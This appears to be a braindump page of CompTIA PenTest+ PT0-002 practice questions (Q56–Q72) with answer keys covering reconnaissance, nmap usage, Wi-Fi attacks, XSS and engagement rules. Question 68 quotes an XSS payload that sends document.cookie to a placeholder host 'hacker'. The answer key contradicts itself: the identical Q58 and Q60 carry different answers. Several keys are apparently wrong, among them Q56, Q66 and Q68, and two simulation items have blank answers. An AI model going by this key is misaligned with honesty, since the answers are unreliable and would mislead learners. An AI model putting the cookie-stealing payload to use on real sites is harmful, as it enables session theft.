Top-Selling PT0-002 Latest Exam Questions: 2021 Latest CompTIA Exam Practice [Q56-Q72]


CompTIA PenTest+ question set: a study guide with the complete questions for the PT0-002 exam

Question 56
A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.)

  • A. Port knocking
  • B. Open-source research
  • C. A ping sweep
  • D. An Nmap scan
  • E. Traffic sniffing
  • F. A vulnerability scan

Correct answer: D,F

Question 57
A penetration tester is attempting to discover live hosts on a subnet quickly.
Which of the following commands will perform a ping scan?

  • A. nmap -sn 10.12.1.0/24
  • B. nmap -sT -p- 10.12.1.0/24
  • C. nmap -sV -A 10.12.1.0/24
  • D. nmap -Pn 10.12.1.0/24

Correct answer: A

Question 58
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
* Have a full TCP connection
* Send a "hello" payload
* Wait for a response
* Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

  • A. Run nmap -Pn -sV -script vuln <IP address>.
  • B. Employ an OpenVAS simple scan against the TCP port of the host.
  • C. Create a script in the Lua language and use it with NSE.
  • D. Perform a credentialed scan with Nessus.

Correct answer: D

Question 59
A red-team tester has been contracted to emulate the threat posed by a malicious insider on a company's network, with the constrained objective of gaining access to sensitive personnel files. During the assessment, the red-team tester identifies an artifact indicating possible prior compromise within the target environment.
Which of the following actions should the tester take?

  • A. Perform forensic analysis to isolate the means of compromise and determine attribution.
  • B. Incorporate the newly identified method of compromise into the red team's approach.
  • C. Halt the assessment and follow the reporting procedures as outlined in the contract.
  • D. Create a detailed document of findings before continuing with the assessment.

Correct answer: D

Question 60
A penetration tester is looking for a vulnerability that enables attackers to open doors via a specialized TCP service that is used for a physical access control system. The service exists on more than 100 different hosts, so the tester would like to automate the assessment. Identification requires the penetration tester to:
* Have a full TCP connection
* Send a "hello" payload
* Wait for a response
* Send a string of characters longer than 16 bytes
Which of the following approaches would BEST support the objective?

  • A. Create a script in the Lua language and use it with NSE.
  • B. Run nmap -Pn -sV -script vuln <IP address>.
  • C. Employ an OpenVAS simple scan against the TCP port of the host.
  • D. Perform a credentialed scan with Nessus.

Correct answer: A

Question 61
You are a security analyst tasked with hardening a web server.
You have been given a list of HTTP payloads that were flagged as malicious.
INSTRUCTIONS
Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Correct answer:

Explanation:
1. Reflected XSS - Input sanitization (<> ...)
2. SQL Injection Stacked - Parameterized Queries
3. DOM XSS - Input Sanitization (<> ...)
4. Local File Inclusion - sandbox req
5. Command Injection - sandbox req
6. SQLi union - parameterized queries
7. SQLi error - parameterized queries
8. Remote File Inclusion - sandbox
9. Command Injection - input saniti $
10. URL redirect - prevent external calls

 

Question 62
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

  • A. A firewall or IPS blocked the scan.
  • B. The penetration tester used unsupported flags.
  • C. The scan returned ICMP echo replies.
  • D. The edge network device was disconnected.

Correct answer: A

Question 63
A company's Chief Executive Officer has created a secondary home office and is concerned that the WiFi service being used is vulnerable to an attack. A penetration tester is hired to test the security of the WiFi's router.
Which of the following is MOST vulnerable to a brute-force attack?

  • A. WPS
  • B. WPA2-EAP
  • C. WPA2-PSK
  • D. WPA-TKIP

Correct answer: A

Question 64
Which of the following commands will allow a penetration tester to permit a shell script to be executed by the file owner?

  • A. chmod o+e script.sh
  • B. chmod o+x script.sh
  • C. chmod u+e script.sh
  • D. chmod u+x script.sh

Correct answer: D

Question 65
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Burp Suite and DIRB
  • B. Netcat and cURL
  • C. Hydra and crunch
  • D. Nmap and OWASP ZAP

Correct answer: A

Question 66
A company becomes concerned when the security alarms are triggered during a penetration test. Which of the following should the company do NEXT?

  • A. Halt the penetration test.
  • B. Assume the alert is from the penetration test.
  • C. Deconflict with the penetration tester.
  • D. Contact law enforcement.

Correct answer: D

Question 67
Which of the following protocols or technologies would provide in-transit confidentiality protection for emailing the final security assessment report?

  • A. DNSSEC
  • B. S/MIME
  • C. AS2
  • D. FTPS

Correct answer: B

Question 68
Given the following code:
<SCRIPT>var+img=new+Image();img.src="http://hacker/%20+%20document.cookie;</SCRIPT>
Which of the following are the BEST methods to prevent this type of attack? (Choose two.)

  • A. Output encoding
  • B. Session tokens
  • C. Web-application firewall
  • D. Base64 encoding
  • E. Parameterized queries
  • F. Input validation

Correct answer: E,F

Question 69
Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware?

  • A. Stop the assessment and inform the emergency contact.
  • B. Remove the malware immediately.
  • C. Do a root-cause analysis to find out how the malware got in.
  • D. Collect the proper evidence and then remove the malware.
  • E. Analyze the malware to see what it does.

Correct answer: A

Question 70
A penetration tester is starting an assessment but only has publicly available information about the target company. The client is aware of this exercise and is preparing for the test.
Which of the following describes the scope of the assessment?

  • A. Physical environment testing
  • B. Partially known environment testing
  • C. Known environment testing
  • D. Unknown environment testing

Correct answer: D

Question 71
You are a penetration tester reviewing a client's website through a web browser.
INSTRUCTIONS
Review all components of the website through the browser to determine if vulnerabilities are present.
Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.






Correct answer:

Explanation:

 

Question 72
......
